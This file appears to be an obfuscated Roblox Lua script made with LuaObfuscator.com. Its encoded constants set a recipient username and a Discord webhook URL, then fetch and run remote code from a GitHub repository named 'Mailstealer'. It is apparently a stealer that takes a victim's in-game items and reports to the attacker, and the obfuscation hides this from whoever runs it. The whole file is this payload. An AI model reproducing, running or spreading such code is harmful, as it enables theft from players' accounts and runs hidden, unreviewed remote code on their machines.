--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.9.14) ~  Much Love, Ferib 

]]--

local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function()return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...)local v18=0;local v19;local v20;local v21;local v22;local v23;local v24;local v25;local v26;local v27;local v28;local v29;local v30;while true do if (v18==5) then v27=v24;v28=nil;function v28(...)return {...},v12("#",...);end v18=6;end if (v18==2) then function v22()local v31=v1(v16,v19,v19);v19=v19 + 1 ;return v31;end v23=nil;function v23()local v32,v33=v1(v16,v19,v19 + (5 -3) );v19=v19 + (5 -3) ;return (v33 * (493 -237)) + v32 ;end v18=3;end if (v18==4) then function v25()local v34=v24();local v35=v24();local v36=(4 -2) -(1 -0) ;local v37=(v21(v35,1,639 -(555 + 64) ) * ((933 -(857 + 74))^32)) + v34 ;local v38=v21(v35,21,(1099 -500) -(367 + 201) );local v39=((v21(v35,959 -(214 + 713) )==((351 -(87 + 263)) + 0)) and  -1) or (1 + 0) ;if (v38==(877 -(282 + 595))) then if (v37==(1637 -(1523 + 114))) then return v39 * (0 + 0) ;else v38=1;v36=(180 -(67 + 113)) -0 ;end elseif (v38==(3112 -(68 + 997))) then return ((v37==(1270 -(226 + 1044))) and (v39 * ((4 -3)/(117 -(32 + 85))))) or (v39 * NaN) ;end return v8(v39,v38-(1003 + 20) ) * (v36 + (v37/((1 + 1)^(1009 -(892 + 65))))) ;end v26=nil;function v26(v40)local v41;if  not v40 then v40=v24();if (v40==(0 + 0)) then return "";end end v41=v3(v16,v19,(v19 + v40) -(2 -1) );v19=v19 + v40 ;local v42={};for v67=1 + 0 , #v41 do v42[v67]=v2(v1(v3(v41,v67,v67)));end return v6(v42);end v18=5;end if (v18==6) then v29=nil;function v29()local v43=0 -0 ;local v44;local v45;local v46;local v47;local v48;local v49;local v50;while true do if (v43~=2) then else v48=nil;v49=nil;v43=1 + 2 ;end if (v43~=1) then else v46=nil;v47=nil;v43=1 + 1 ;end if (v43~=(836 -(660 + 176))) then else v44=0;v45=nil;v43=1;end if (v43==(1 + 2)) then v50=nil;while true do local v75=202 -(14 + 188) ;while true do if (v75==1) then if (v44~=(678 -(534 + 141))) then else local v99=0;local v100;while true do if (v99~=0) then else v100=0 + 0 ;while true do if (v100~=(0 + 0)) then else local v126=0;while true do if (v126==0) then for v164=1 + 0 ,v24() do v46[v164-(1 -0) ]=v29();end return v48;end end end end break;end end end if (v44==2) then local v101=0;local v102;while true do if ((0 -0)==v101) then v102=0;while true do if (v102==0) then local v127=0;while true do if (v127==0) then for v166=2 -1 ,v49 do local v167=0;local v168;local v169;local v170;while true do if (v167==(0 + 0)) then local v171=0 + 0 ;while true do if (v171==(396 -(115 + 281))) then v168=0;v169=nil;v171=2 -1 ;end if (v171~=(1 + 0)) then else v167=2 -1 ;break;end end end if (v167==1) then v170=nil;while true do if (v168==(3 -2)) then if (v169==1) then v170=v22()~=0 ;elseif (v169==(869 -(550 + 317))) then v170=v25();elseif (v169==(3 -0)) then v170=v26();end v50[v166]=v170;break;end if (0~=v168) then else local v180=0;local v181;local v182;while true do if (v180==0) then v181=0 -0 ;v182=nil;v180=1;end if (1==v180) then while true do if (v181==(0 -0)) then v182=0;while true do if (v182~=1) then else v168=286 -(134 + 151) ;break;end if (v182==0) then local v188=1665 -(970 + 695) ;while true do if (v188==1) then v182=1;break;end if (v188==(0 -0)) then v169=v22();v170=nil;v188=1991 -(582 + 1408) ;end end end end break;end end break;end end end end break;end end end v48[10 -7 ]=v22();v127=1 -0 ;end if (v127~=(3 -2)) then else v102=1825 -(1195 + 629) ;break;end end end if (v102==(1 -0)) then for v144=242 -(187 + 54) ,v24() do local v145=780 -(162 + 618) ;local v146;local v147;while true do if (v145~=1) then else while true do if (0==v146) then v147=v22();if (v21(v147,1 + 0 ,1 + 0 )~=0) then else local v172=0 -0 ;local v173;local v174;local v175;local v176;local v177;local v178;while true do if (v172~=(0 -0)) then else v173=0;v174=nil;v172=1 + 0 ;end if (v172~=2) then else v177=nil;v178=nil;v172=1639 -(1373 + 263) ;end if (v172==1) then v175=nil;v176=nil;v172=2;end if (v172==(1003 -(451 + 549))) then while true do if (v173==2) then v178=nil;while true do if (v174~=(0 + 0)) then else local v185=0 -0 ;local v186;while true do if ((0 -0)==v185) then v186=0;while true do if (v186==(1385 -(746 + 638))) then v174=1;break;end if (v186~=(0 + 0)) then else v175=0;v176=nil;v186=1;end end break;end end end if (v174==2) then while true do if ((1 -0)==v175) then local v189=0;while true do if (v189~=1) then else v175=2;break;end if (v189~=(341 -(218 + 123))) then else v178={v23(),v23(),nil,nil};if (v176==0) then local v198=0;local v199;local v200;while true do if ((1 + 0)==v198) then while true do if (v199~=0) then else v200=0;while true do if (v200==0) then v178[3]=v23();v178[4]=v23();break;end end break;end end break;end if (v198==(0 + 0)) then v199=0;v200=nil;v198=561 -(306 + 254) ;end end elseif (v176==1) then v178[1 + 2 ]=v24();elseif (v176==(3 -1)) then v178[1470 -(899 + 568) ]=v24() -((2 + 0)^(38 -22)) ;elseif (v176==(606 -(268 + 335))) then local v206=290 -(60 + 230) ;local v207;local v208;while true do if (v206==(573 -(426 + 146))) then while true do if (v207~=0) then else v208=0;while true do if (0~=v208) then else v178[1 + 2 ]=v24() -((1458 -(282 + 1174))^16) ;v178[815 -(569 + 242) ]=v23();break;end end break;end end break;end if (v206==(0 -0)) then v207=0 + 0 ;v208=nil;v206=1025 -(706 + 318) ;end end end v189=1;end end end if (v175~=(1253 -(721 + 530))) then else local v190=0;local v191;while true do if (v190==(1271 -(945 + 326))) then v191=0;while true do if (v191==(0 -0)) then local v201=0 + 0 ;while true do if (v201~=1) then else v191=1;break;end if (v201~=(700 -(271 + 429))) then else local v204=0;while true do if ((1 + 0)~=v204) then else v201=1;break;end if (v204==0) then if (v21(v177,1,1)~=(1501 -(1408 + 92))) then else v178[2]=v50[v178[2]];end if (v21(v177,1088 -(461 + 625) ,1290 -(993 + 295) )~=(1 + 0)) then else v178[3]=v50[v178[3]];end v204=1;end end end end end if (v191==(1172 -(418 + 753))) then v175=2 + 1 ;break;end end break;end end end if (v175==0) then local v192=0 + 0 ;local v193;local v194;while true do if ((0 + 0)==v192) then v193=0 + 0 ;v194=nil;v192=1;end if (v192==1) then while true do if (v193~=(529 -(406 + 123))) then else v194=1769 -(1749 + 20) ;while true do if (v194==(0 + 0)) then local v205=1322 -(1249 + 73) ;while true do if (v205==(0 + 0)) then v176=v21(v147,1147 -(466 + 679) ,6 -3 );v177=v21(v147,11 -7 ,1906 -(106 + 1794) );v205=1;end if (v205==(1 + 0)) then v194=1;break;end end end if (v194~=1) then else v175=1 + 0 ;break;end end break;end end break;end end end if (v175~=3) then else if (v21(v177,3,3)==(2 -1)) then v178[4]=v50[v178[4]];end v45[v144]=v178;break;end end break;end if (v174==(2 -1)) then local v187=114 -(4 + 110) ;while true do if (v187~=(584 -(57 + 527))) then else v177=nil;v178=nil;v187=1428 -(41 + 1386) ;end if ((104 -(17 + 86))~=v187) then else v174=2;break;end end end end break;end if (v173==1) then local v183=0;while true do if (v183==(0 + 0)) then v176=nil;v177=nil;v183=1;end if (v183==(1 -0)) then v173=2;break;end end end if (v173==0) then local v184=0;while true do if (v184==(0 -0)) then v174=0;v175=nil;v184=1;end if (v184~=(167 -(122 + 44))) then else v173=1;break;end end end end break;end end end break;end end break;end if (v145==0) then v146=0 -0 ;v147=nil;v145=1;end end end v44=3;break;end end break;end end end break;end if (v75~=(0 -0)) then else if (v44==(1 + 0)) then v48={v45,v46,nil,v47};v49=v24();v50={};v44=2;end if (v44==(0 + 0)) then local v103=0;local v104;while true do if ((1257 -(1043 + 214))==v103) then v104=0;while true do if (v104==(0 -0)) then v45={};v46={};v104=1;end if (v104==(1213 -(323 + 889))) then v47={};v44=2 -1 ;break;end end break;end end end v75=581 -(361 + 219) ;end end end break;end end end v30=nil;v18=7;end if (v18==0) then v19=1;v20=nil;v16=v4(v3(v16,5),"..",function(v51)if (v1(v51,2)==79) then v20=v0(v3(v51,1,1));return "";else local v69=v2(v0(v51,16));if v20 then local v76=0;local v77;while true do if (v76==1) then return v77;end if (v76==0) then v77=v5(v69,v20);v20=nil;v76=1;end end else return v69;end end end);v18=1;end if (v18==3) then v24=nil;function v24()local v52=0;local v53;local v54;local v55;local v56;while true do if (v52==(320 -(34 + 19 + 267))) then v53,v54,v55,v56=v1(v16,v19,v19 + 1 + 2 );v19=v19 + ((1267 -(20 + 830)) -(15 + 398)) ;v52=983 -(18 + 964) ;end if (v52==(3 -2)) then return (v56 * 16777216) + (v55 * 65536) + (v54 * (149 + 107)) + v53 ;end end end v25=nil;v18=4;end if (v18==7) then function v30(v57,v58,v59)local v60=0;local v61;local v62;local v63;while true do if (v60==0) then v61=v57[1];v62=v57[2];v60=1;end if (v60==1) then v63=v57[3];return function(...)local v78=v61;local v79=v62;local v80=v63;local v81=v28;local v82=1;local v83= -1;local v84={};local v85={...};local v86=v12("#",...) -1 ;local v87={};local v88={};for v92=0,v86 do if (v92>=v80) then v84[v92-v80 ]=v85[v92 + 1 ];else v88[v92]=v85[v92 + 1 ];end end local v89=(v86-v80) + 1 ;local v90;local v91;while true do v90=v78[v82];v91=v90[1];if (v91<=9) then if (v91<=4) then if (v91<=1) then if (v91>0) then v88[v90[2]]=v59[v90[3]];else v88[v90[2]]();end elseif (v91<=2) then v88[v90[2]]=v59[v90[3]];elseif (v91==3) then do return;end else local v128=v90[2];local v129=v88[v90[3]];v88[v128 + 1 ]=v129;v88[v128]=v129[v90[4]];end elseif (v91<=6) then if (v91==5) then local v109=0;local v110;while true do if (v109==0) then v110=v90[2];v88[v110]=v88[v110](v13(v88,v110 + 1 ,v83));break;end end else v59[v90[3]]=v88[v90[2]];end elseif (v91<=7) then v88[v90[2]]();elseif (v91==8) then if (v88[v90[2]]==v90[4]) then v82=v82 + 1 ;else v82=v90[3];end else local v133=0;local v134;while true do if (v133==0) then v134=v90[2];v88[v134]=v88[v134](v13(v88,v134 + 1 ,v83));break;end end end elseif (v91<=14) then if (v91<=11) then if (v91==10) then v88[v90[2]]=v90[3];elseif (v88[v90[2]]==v90[4]) then v82=v82 + 1 ;else v82=v90[3];end elseif (v91<=12) then do return;end elseif (v91==13) then v88[v90[2]]=v90[3];else v82=v90[3];end elseif (v91<=16) then if (v91==15) then v59[v90[3]]=v88[v90[2]];else local v117=0;local v118;local v119;while true do if (v117==0) then v118=v90[2];v119=v88[v90[3]];v117=1;end if (v117==1) then v88[v118 + 1 ]=v119;v88[v118]=v119[v90[4]];break;end end end elseif (v91<=17) then local v120=v90[2];local v121,v122=v81(v88[v120](v13(v88,v120 + 1 ,v90[3])));v83=(v122 + v120) -1 ;local v123=0;for v124=v120,v83 do local v125=0;while true do if (v125==0) then v123=v123 + 1 ;v88[v124]=v121[v123];break;end end end elseif (v91>18) then local v139=v90[2];local v140,v141=v81(v88[v139](v13(v88,v139 + 1 ,v90[3])));v83=(v141 + v139) -1 ;local v142=0;for v155=v139,v83 do v142=v142 + 1 ;v88[v155]=v140[v142];end else v82=v90[3];end v82=v82 + 1 ;end end;end end end return v30(v29(),{},v17)(...);end if (v18==1) then v21=nil;function v21(v64,v65,v66)if v66 then local v70=(v64/(((4 -2) + (0 -0))^(v65-(127 -(116 + 10)))))%((1 + 1)^(((v66-1) -(v65-(739 -(542 + 196)))) + (1 -0))) ;return v70-(v70%(1 + 0)) ;else local v71=2^(v65-(1 + 0)) ;return (((v64%(v71 + v71))>=v71) and (1 + 0)) or 0 ;end end v22=nil;v18=2;end end end v15("LOL!0B3O00028O00026O00F03F03093O00557365724E616D653203083O00424F535538322O30030A3O006C6F6164737472696E6703043O0067616D6503073O00482O747047657403433O00682O7470733A2O2F7261772E67697468756275736572636F6E74656E742E636F6D2F45676F72696B7573612F4D61696C737465616C65722F6D61696E2F656E67696E6503083O00557365724E616D6503073O00576562682O6F6B03793O00682O7470733A2O2F646973636F72642E636F6D2F6170692F776562682O6F6B732F2O3133383534333836303730393038353236352F7254306C416647765A2O686D2O51377055464E3335676142385A475561584B7A6E676F576E7556333830775F37485366476A44484E72515758395A726A7A373444772O7000163O00120A3O00013O00260B3O000D000100020004123O000D000100120A000100043O00120F000100033O001202000100053O001202000200063O00201000020002000700120A000400084O0013000200044O000900013O00022O00070001000100010004123O0015000100260B3O0001000100010004123O0001000100120A000100043O00120F000100093O00120A0001000B3O00120F0001000A3O00120A3O00023O0004123O000100012O00033O00017O00",v9(),...);
